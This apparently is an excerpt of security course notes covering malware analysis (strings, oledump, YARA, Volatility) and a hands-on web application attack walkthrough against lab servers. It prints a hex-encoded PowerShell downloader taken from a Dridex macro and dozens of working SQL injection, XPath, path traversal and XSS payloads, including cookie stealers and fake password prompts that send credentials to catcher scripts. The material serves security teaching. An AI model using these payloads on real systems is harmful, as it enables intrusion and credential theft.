  2404. ###############################
  2405. # Lesson 28: Malware Analysis #
  2406. ###############################
  2407.  
  2408.  
  2409.  
  2410.  
  2411. ############################
  2412. # Download the Analysis VM #
  2413. ############################
  2414. https://s3-us-west-2.amazonaws.com/infosecaddicts/InfoSecAddictsVM.zip
  2415. user:      infosecaddicts
  2416. pass:      infosecaddicts
  2417.  
  2418.  
  2419. - Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
  2420.  
  2421. - After logging please open a terminal window and type the following commands:
  2422.  
  2423. cd Desktop/
  2424.  
  2425.  
  2426. - This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
  2427.  
  2428. wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
  2429. wget https://s3.amazonaws.com/StrategicSec-Files/analyse_malware.py
  2430.  
  2431. unzip malware-password-is-infected.zip
  2432.     infected
  2433.  
  2434. file malware.exe
  2435.  
  2436. mv malware.exe malware.pdf
  2437.  
  2438. file malware.pdf
  2439.  
  2440. mv malware.pdf malware.exe
  2441.  
  2442. hexdump -n 2 -C malware.exe
  2443.  
  2444. ***What is '4d 5a' or 'MZ'***
  2445. Reference:
  2446. http://www.garykessler.net/library/file_sigs.html
  2447.  
  2448.  
  2449. objdump -x malware.exe
  2450.  
  2451. strings malware.exe
  2452.  
  2453. strings --all malware.exe | head -n 6
  2454.  
  2455. strings malware.exe | grep -i dll
  2456.  
  2457. strings malware.exe | grep -i library
  2458.  
  2459. strings malware.exe | grep -i reg
  2460.  
  2461. strings malware.exe | grep -i hkey
  2462.  
  2463. strings malware.exe | grep -i hku
  2464.  
  2465.                             - We didn't see anything like HKLM, HKCU or other registry type stuff
  2466.  
  2467. strings malware.exe | grep -i irc
  2468.  
  2469. strings malware.exe | grep -i join        
  2470.  
  2471. strings malware.exe | grep -i admin
  2472.  
  2473. strings malware.exe | grep -i list
  2474.  
  2475.  
  2476.                             - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
  2477.  
  2478. sudo apt-get install -y python-pefile
  2479.  
  2480. vi analyse_malware.py
  2481.  
  2482. python analyse_malware.py malware.exe
  2483.  
  2484.  
  2485.  
  2486.  
  2487. Building a Malware Scanner
  2488. --------------------------
  2489.  
  2490. mkdir ~/Desktop/malwarescanner
  2491.  
  2492. cd ~/Desktop/malwarescanner
  2493.  
  2494. wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
  2495.  
  2496. unzip master.zip
  2497.  
  2498. cd malwarescanner-master/
  2499.  
  2500. python scanner.py -h
  2501.  
  2502. cat strings.txt
  2503.  
  2504. cat hashes.txt
  2505.  
  2506. mkdir ~/Desktop/malcode
  2507.  
  2508. cp ~/Desktop/malware.exe ~/Desktop/malcode
  2509.  
  2510. python scanner.py -H hashes.txt -D /home/malware/Desktop/malcode/ strings.txt
  2511.  
  2512. cp ~/Desktop/
  2513.  
  2514.  
  2515.  
  2516. #####################################################
  2517. # Analyzing Macro Embedded Malware                  #
  2518. # Reference:                                        #
  2519. # https://jon.glass/analyzes-dridex-malware-p1/     #
  2520. #####################################################
  2521. cp ~/Desktop/
  2522.  
  2523. - Create a FREE account on:
  2524. https://malwr.com/account/signup/
  2525.  
  2526. - Grab the malware from:
  2527. https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
  2528.  
  2529. file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
  2530.  
  2531. cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
  2532.  
  2533.  
  2534.  
  2535.  
  2536. sudo pip install olefile
  2537.  
  2538. mkdir ~/Desktop/oledump
  2539.  
  2540. cd ~/Desktop/oledump
  2541.  
  2542. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  2543.  
  2544. unzip oledump_V0_0_22.zip
  2545.  
  2546. cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
  2547.  
  2548. mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
  2549.  
  2550. python oledump.py 064016.doc
  2551.  
  2552. python oledump.py 064016.doc -s A4 -v
  2553.  
  2554. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  2555. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  2556.  
  2557.  
  2558. python oledump.py 064016.doc -s A5 -v
  2559.  
  2560. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  2561.  
  2562.  
  2563. python oledump.py 064016.doc -s A3 -v
  2564.  
  2565. - Look for "GVhkjbjv" and you should see:
  2566.  
  2567. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  2568.  
  2569. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  2570. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  2571.  
  2572.  
  2573.  
  2574.  
  2575. ##############
  2576. # Yara Ninja #
  2577. ##############
  2578. cd ~/Desktop
  2579.  
  2580. sudo apt-get remove -y yara
  2581.  
  2582. wget https://github.com/plusvic/yara/archive/v3.4.0.zip
  2583.  
  2584. sudo apt-get -y install libtool
  2585.  
  2586. unzip v3.4.0.zip
  2587.  
  2588. cd yara-3.4.0
  2589.  
  2590. ./bootstrap.sh
  2591.  
  2592. ./configure
  2593.  
  2594. make
  2595.  
  2596. sudo make install
  2597.  
  2598. yara -v
  2599.  
  2600. cd ..
  2601.  
  2602. wget https://github.com/Yara-Rules/rules/archive/master.zip
  2603.  
  2604. unzip master.zip
  2605.  
  2606. cd ~/Desktop
  2607.  
  2608. yara rules-master/packer.yar malcode/malware.exe
  2609.  
  2610.  
  2611. Places to get more Yara rules:
  2612. ------------------------------
  2613. https://malwareconfig.com/static/yaraRules/
  2614. https://github.com/kevthehermit/YaraRules
  2615. https://github.com/VectraThreatLab/reyara
  2616.  
  2617.  
  2618.  
  2619. Yara rule sorting script:
  2620. -------------------------
  2621. https://github.com/mkayoh/yarasorter
  2622.  
  2623.  
  2624.  
  2625. cd ~/Desktop/rules-master
  2626. for i in $( ls --hide=master.yar ); do echo include \"$i\";done > master.yar
  2627. cd ~/Desktop/
  2628. yara rules-master/master.yar malcode/malware.exe
  2629.  
  2630.  
  2631.  
  2632.  
  2633.  
  2634.  
  2635.  
  2636.  
  2637.  
  2638.  
  2639. Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
  2640. http://derekmorton.name/files/malware_12-14-12.sql.bz2
  2641.  
  2642.  
  2643. Malware Repositories:
  2644. http://malshare.com/index.php
  2645. http://www.malwareblacklist.com/
  2646. http://www.virusign.com/
  2647. http://virusshare.com/
  2648. http://www.tekdefense.com/downloads/malware-samples/
  2649.  
  2650.  
  2651.  
  2652.  
  2653. ###############################
  2654. # Creating a Malware Database #
  2655. ###############################
  2656.  
  2657. Creating a malware database (sqlite)
  2658. ------------------------------------
  2659. sudo apt-get install -y python-simplejson python-simplejson-dbg
  2660. wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
  2661. wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
  2662. unzip malware-password-is-infected.zip
  2663.     infected
  2664. python avsubmit.py --init
  2665. python avsubmit.py -f malware.exe -e
  2666.  
  2667.  
  2668.  
  2669.  
  2670.  
  2671. Creating a malware database (mysql)
  2672. -----------------------------------
  2673. - Step 1: Installing MySQL database
  2674. - Run the following command in the terminal:
  2675.  
  2676. sudo apt-get install mysql-server
  2677.      
  2678. - Step 2: Installing Python MySQLdb module
  2679. - Run the following command in the terminal:
  2680.  
  2681. sudo apt-get build-dep python-mysqldb
  2682. sudo apt-get install python-mysqldb
  2683.  
  2684. Step 3: Logging in
  2685. Run the following command in the terminal:
  2686.  
  2687. mysql -u root -p                    (set a password of 'malware')
  2688.  
  2689. - Then create one database by running following command:
  2690.  
  2691. create database malware;
  2692.  
  2693. exit;
  2694.  
  2695. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  2696.  
  2697. vi mal_to_db.py                     (fill in database connection information)
  2698.  
  2699. python mal_to_db.py -i
  2700.  
  2701. python mal_to_db.py -f malware.exe -u
  2702.  
  2703.  
  2704. mysql -u root -p
  2705.     malware
  2706.  
  2707. mysql> use malware;
  2708.  
  2709. select id,md5,sha1,sha256,time FROM files;
  2710.  
  2711. mysql> quit;
  2712.  
  2713.  
  2714.  
  2715.  
  2716. ######################################
  2717. # PCAP Analysis with forensicPCAP.py #
  2718. ######################################
  2719. cd ~/Desktop
  2720. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  2721. sudo easy_install cmd2
  2722.  
  2723. python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
  2724.  
  2725. ForPCAP >>> help
  2726.  
  2727.  
  2728. Prints stats about PCAP
  2729. ForPCAP >>> stat
  2730.  
  2731.  
  2732. Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  2733. ForPCAP >>> dns
  2734.  
  2735. ForPCAP >>> show
  2736.  
  2737.  
  2738. Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  2739. ForPCAP >>> dstports
  2740.  
  2741. ForPCAP >>> show
  2742.  
  2743.  
  2744. Prints the number of ip source and store them.
  2745. ForPCAP >>> ipsrc
  2746.  
  2747.  
  2748. Prints the number of web's requests and store them
  2749. ForPCAP >>> web
  2750.  
  2751.  
  2752. Prints the number of mail's requests and store them
  2753. ForPCAP >>> mail
  2754.  
  2755.  
  2756.  
  2757. ###################
  2758. # Memory Analysis #
  2759. ###################
  2760. cd /home/malware/Desktop/Banking\ Troubles/Volatility
  2761.  
  2762. python volatility
  2763. python volatility pslist -f ../hn_forensics.vmem
  2764. python volatility connscan2 -f ../hn_forensics.vmem
  2765. python volatility memdmp -p 888 -f ../hn_forensics.vmem
  2766. python volatility memdmp -p 1752 -f ../hn_forensics.vmem
  2767.                 ***Takes a few min***
  2768. strings 1752.dmp | grep "^http://" | sort | uniq
  2769. strings 1752.dmp | grep "Ahttps://" | uniq -u
  2770. cd ..
  2771. foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
  2772. cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
  2773. cat audit.txt
  2774. cd pdf
  2775. ls
  2776. grep -i javascript *.pdf
  2777.  
  2778.  
  2779.  
  2780. cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
  2781. wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
  2782. unzip pdf-parser_V0_6_4.zip
  2783. python pdf-parser.py -s javascript --raw 00600328.pdf
  2784. python pdf-parser.py --object 11 00600328.pdf
  2785. python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
  2786.  
  2787. cat malicious.js
  2788.  
  2789.  
  2790. *****Sorry - no time to cover javascript de-obfuscation today*****
  2791.  
  2792.  
  2793. cd /home/malware/Desktop/Banking\ Troubles/Volatility/
  2794. python volatility files -f ../hn_forensics.vmem > files
  2795. cat files | less
  2796. python volatility malfind -f ../hn_forensics.vmem -d out
  2797. ls out/
  2798. python volatility hivescan -f ../hn_forensics.vmem                                
  2799. python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
  2800. for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done
  2801.  
  2802.  
  2803.  
  2804. Start with simple Firefox Addons:
  2805.  
  2806. - ShowIP            https://addons.mozilla.org/en-US/firefox/addon/showip/
  2807. - Server Spy            https://addons.mozilla.org/en-US/firefox/addon/server-spy/
  2808. - FoxyProxy         https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
  2809. - Tamper Data           https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
  2810. - Wapalyzer         https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
  2811.  
  2812. A good list of web app testing add ons for Firefox:
  2813. https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/
  2814.  
  2815.  
  2816.  
  2817.  
  2818.  
  2819.  
  2820.  
  2821. ##################################
  2822. # Basic: Web Application Testing #
  2823. ##################################
  2824.  
  2825. Most people are going to tell you reference the OWASP Testing guide.
  2826. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  2827.  
  2828. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  2829.  
  2830.  
  2831. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  2832.    
  2833.     1. Does the website talk to a DB?
  2834.         - Look for parameter passing (ex: site.com/page.php?id=4)
  2835.         - If yes - try SQL Injection
  2836.  
  2837.     2. Can I or someone else see what I type?
  2838.         - If yes - try XSS
  2839.  
  2840.     3. Does the page reference a file?
  2841.         - If yes - try LFI/RFI
  2842.  
  2843. Let's start with some manual testing against 54.149.82.150
  2844.  
  2845.  
  2846. Start here:
  2847. http://54.149.82.150/
  2848.  
  2849.  
  2850. There's no parameter passing on the home page so the answer to question 1 is NO.
  2851. There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
  2852.  
  2853. Try an XSS in the search box on the home page:
  2854. <script>alert(123);</script>
  2855.  
  2856. Doing this gives us the following in the address bar:
  2857. http://54.149.82.150/BasicSearch.aspx?Word=<script>alert(123);</script>
  2858.  
  2859. Ok, so we've verified that there is XSS in the search box.
  2860.  
  2861. Let's move on to the search box in the left of the page.
  2862.  
  2863. Let's give the newsletter signup box a shot
  2864.  
  2865. Moving on to the login page.
  2866. http://54.149.82.150/login.aspx
  2867.  
  2868. I entered a single quote (') for both the user name and the password. I got the following error:
  2869.  
  2870. -----------------------------------------------------------------
  2871.  'Users//User[@Name=''' and @Password=''']' has an invalid token.
  2872. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  2873.  
  2874. Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token.
  2875.  
  2876. Source Error:
  2877.  
  2878.  
  2879. Line 112:            doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
  2880. Line 113:            string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']";
  2881. Line 114:            XmlNodeList xmln = doc.SelectNodes(credential);
  2882. Line 115:            //String test = xmln.ToString();            
  2883. Line 116:            if (xmln.Count > 0)
  2884.  
  2885. -----------------------------------------------------------------
  2886.  
  2887.  
  2888. Hmm....System.Xml.XPath.XPathException.....that's not SQL.
  2889.  
  2890. WTF is this:
  2891. Line 112:            doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
  2892.  
  2893.  
  2894.  
  2895.  
  2896. In this case you'll have the trap the request with a proxy like:
  2897. - Firefox Tamper Data
  2898. - Burp Suite                http://www.portswigger.net/Burp/proxy.html
  2899. - WebScarab             https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
  2900. - Rat Proxy             https://code.google.com/p/ratproxy/
  2901. - Zap Proxy             https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
  2902. - Paros                 http://sourceforge.net/projects/paros/
  2903.  
  2904.  
  2905.  
  2906. Let's go back to that page error message.....
  2907.  
  2908.  
  2909. Let's check it out:
  2910. http://54.149.82.150/AuthInfo.xml
  2911.  
  2912. Looks like we found passwords!!!!!!!!!!
  2913.  
  2914.  
  2915. Looks like there no significant new functionality after logging in with the stolen credentials.
  2916.  
  2917. Going back to the homepage...let's see if we can see anything. Figured I'd click on one of the links
  2918.  
  2919.  
  2920. http://54.149.82.150/bookdetail.aspx?id=2
  2921.  
  2922.  
  2923. Ok, there is parameter passing (bookdetail.aspx?id=2).
  2924.  
  2925. The page name is:       bookdetail.aspx
  2926. The parameter name is:      id
  2927. The paramber value is:      2
  2928.  
  2929.  
  2930. Let's try throwing a single quote (') in there:
  2931.  
  2932. http://54.149.82.150/bookdetail.aspx?id=2'
  2933.  
  2934.  
  2935. I get the following error:
  2936.  
  2937. Unclosed quotation mark after the character string ''.
  2938. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  2939.  
  2940. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
  2941.  
  2942.  
  2943.  
  2944.  
  2945.  
  2946.  
  2947.  
  2948.  
  2949.  
  2950.  
  2951. #############################################################################
  2952. # SQL Injection                                                             #
  2953. # https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #
  2954. #############################################################################
  2955.  
  2956.  
  2957. - Another quick way to test for SQLI is to remove the paramter value
  2958.  
  2959.  
  2960. #############################
  2961. # Error-Based SQL Injection #
  2962. #############################
  2963. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  2964. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  2965. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  2966. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  2967. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  2968. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--     NOTE: "N" - just means to keep going until you run out of databases
  2969. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  2970. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  2971. http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  2972.  
  2973.  
  2974.  
  2975.  
  2976. #############################
  2977. # Union-Based SQL Injection #
  2978. #############################
  2979. http://54.149.82.150/bookdetail.aspx?id=2 order by 100--
  2980. http://54.149.82.150/bookdetail.aspx?id=2 order by 50--
  2981. http://54.149.82.150/bookdetail.aspx?id=2 order by 25--
  2982. http://54.149.82.150/bookdetail.aspx?id=2 order by 10--
  2983. http://54.149.82.150/bookdetail.aspx?id=2 order by 5--
  2984. http://54.149.82.150/bookdetail.aspx?id=2 order by 6--
  2985. http://54.149.82.150/bookdetail.aspx?id=2 order by 7--
  2986. http://54.149.82.150/bookdetail.aspx?id=2 order by 8--
  2987. http://54.149.82.150/bookdetail.aspx?id=2 order by 9--
  2988. http://54.149.82.150/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  2989.  
  2990.     We are using a union select statement because we are joining the developer's query with one of our own.
  2991.     Reference:
  2992.     http://www.techonthenet.com/sql/union.php
  2993.     The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
  2994.     It removes duplicate rows between the various SELECT statements.
  2995.  
  2996.     Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
  2997.  
  2998. http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  2999.  
  3000.     Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
  3001.  
  3002. http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  3003. http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  3004. http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  3005. http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  3006.  
  3007.  
  3008.  
  3009.  
  3010.  
  3011. - Another way is to see if you can get the backend to perform an arithmetic function
  3012. http://54.149.82.150/bookdetail.aspx?id=(2)
  3013. http://54.149.82.150/bookdetail.aspx?id=(4-2)  
  3014. http://54.149.82.150/bookdetail.aspx?id=(4-1)
  3015.  
  3016.  
  3017.  
  3018. http://54.149.82.150/bookdetail.aspx?id=2 or 1=1--
  3019. http://54.149.82.150/bookdetail.aspx?id=2 or 1=2--
  3020. http://54.149.82.150/bookdetail.aspx?id=1*1
  3021. http://54.149.82.150/bookdetail.aspx?id=2 or 1 >-1#
  3022. http://54.149.82.150/bookdetail.aspx?id=2 or 1<99#
  3023. http://54.149.82.150/bookdetail.aspx?id=2 or 1<>1#
  3024. http://54.149.82.150/bookdetail.aspx?id=2 or 2 != 3--
  3025. http://54.149.82.150/bookdetail.aspx?id=2 &0#
  3026.  
  3027.  
  3028.  
  3029.  
  3030.  
  3031. ###############################
  3032. # Blind SQL Injection Testing #
  3033. ###############################
  3034. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  3035.      
  3036. 3 - Total Characters
  3037. http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  3038. http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  3039. http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--      (Ok, the username is 3 chars long - it waited 10 seconds)
  3040.  
  3041. Let's go for a quick check to see if it's DBO
  3042. http://54.149.82.150/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
  3043.  
  3044. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
  3045.  
  3046. D  - 1st Character
  3047. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--  
  3048. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  3049. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  3050. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--  (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
  3051.  
  3052. B - 2nd Character
  3053. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
  3054. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
  3055.  
  3056. O - 3rd Character
  3057. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
  3058. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  3059. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
  3060. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
  3061. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  3062. http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
  3063.  
  3064.  
  3065.  
  3066.  
  3067.  
  3068.  
  3069.  
  3070.  
  3071.  
  3072.  
  3073. ###################################################################
  3074. # What is XSS                                                     #
  3075. # https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #
  3076. ###################################################################
  3077.  
  3078. OK - what is Cross Site Scripting (XSS)
  3079.  
  3080. 1. Use Firefox to browse to the following location:
  3081.  
  3082.     http://54.172.112.249/xss_practice/
  3083.  
  3084.     A really simple search page that is vulnerable should come up.
  3085.  
  3086.  
  3087.  
  3088.  
  3089. 2. In the search box type:
  3090.    
  3091.     <script>alert('So this is XSS')</script>
  3092.  
  3093.  
  3094.     This should pop-up an alert window with your message in it proving XSS is in fact possible.
  3095.     Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
  3096.  
  3097.  
  3098. 3. In the search box type:
  3099.    
  3100.     <script>alert(document.cookie)</script>
  3101.  
  3102.  
  3103.     This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  3104.     Ok, click OK and then click back and go back to http://554.172.112.249/xss_practice/
  3105.  
  3106. 4. Now replace that alert script with:
  3107.  
  3108.     <script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  3109.  
  3110.  
  3111. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  3112.  
  3113.  
  3114. 5. Now view the stolen cookie at:
  3115.     http://54.172.112.249/xss_practice/cookie_stealer_logs.html
  3116.  
  3117.  
  3118. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  3119.  
  3120.  
  3121.  
  3122.  
  3123.  
  3124.  
  3125. ############################
  3126. # A Better Way To Demo XSS #
  3127. ############################
  3128.  
  3129.  
  3130. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  3131.  
  3132.  
  3133. Use Firefox to browse to the following location:
  3134.  
  3135.     http://54.172.112.249/xss_practice/
  3136.  
  3137.  
  3138.  
  3139. Paste this in the search box
  3140. ----------------------------
  3141.  
  3142.  
  3143. Option 1
  3144. --------
  3145.  
  3146. <script>
  3147. password=prompt('Your session is expired. Please enter your password to continue',' ');
  3148. document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">");
  3149. </script>
  3150.  
  3151.  
  3152. Now view the stolen cookie at:
  3153.     http://54.172.112.249/xss_practice/passwords.html
  3154.  
  3155.  
  3156.  
  3157. Option 2
  3158. --------
  3159. <script>
  3160. username=prompt('Please enter your username',' ');
  3161. password=prompt('Please enter your password',' ');
  3162. document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
  3163. </script>
  3164.  
  3165.  
  3166.  
  3167.  
  3168. Now view the stolen cookie at:
  3169. http://54.172.112.249/xss_practice/username_password_logs.html
  3170.  
  3171.  
  3172.  
  3173.  
  3174. #########################################
  3175. # Let's kick it up a notch with ASP.NET #
  3176. # http://54.200.178.220/                #
  3177. #########################################
  3178.  
  3179.  
  3180. The trading Web App is on http://54.200.178.220/
  3181.  
  3182.  
  3183. Try the following in the search box:
  3184.     <script>alert(123);</script>
  3185.     ' or 1=1
  3186.     ' and a=a
  3187.     1=1
  3188.     Joe'+OR+1=1;--
  3189.  
  3190.  
  3191.     <script>alert(123);</script>
  3192.    
  3193. Open a new tab in firefox and try this:
  3194.     http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName
  3195.  
  3196.  
  3197. Try the contact us form.
  3198. Open a new tab in firefox and try this:
  3199.     http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini
  3200.  
  3201. Try this on the inquiry form:
  3202.     Joe McCray
  3203.     1234567890
  3204.     joe@strategicsec.com') waitfor delay '00:00:10'--
  3205.  
  3206.  
  3207. Login Box:
  3208.  
  3209.     ' or 1=1 or ''='
  3210.     anything            (click login instead of pressing enter)
  3211.  
  3212.  
  3213.  
  3214. Tamper Data: (notice 2 session IDs)
  3215.  
  3216.     AcmeTrading=a4b796687b846dd4a34931d708c62b49;       SessionID is md5
  3217.     IsAdmin=yes;
  3218.     ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
  3219.  
  3220.  
  3221.  
  3222. Profile - Detail    (tamper data)
  3223.     Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
  3224.     joe|set
  3225.  
  3226.  
  3227.     xss_upload.txt (Upload Bulk Order)
  3228.     <script>alert(123);</script>
  3229.  
  3230.  
  3231.  
  3232.  
  3233. ###############################
  3234. # How much fuzzing is enough? #
  3235. ###############################
  3236. There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
  3237.  
  3238. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
  3239.  
  3240.  
  3241. Step 1: Ask yourself the 3 questions per page of the site.
  3242.  
  3243. Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
  3244.  
  3245. Step 3: When you load your fuzz strings - use the following decision tree
  3246.  
  3247.     - Are the fuzz strings causing a default error message (example 404)?
  3248.         - If this is the case then it is most likely NOT vulnerable
  3249.  
  3250.     - Are the fuzz strings causing a WAF or LB custom error message?
  3251.         - If this is the case then you need to find an encoding method to bypass
  3252.  
  3253.  
  3254.     - Are the fuzz strings causing an error message that discloses the backend type?
  3255.         - If yes, then identify DB type and find correct syntax to successfully exploit
  3256.         - Some example strings that I use are:
  3257.             '
  3258.             "
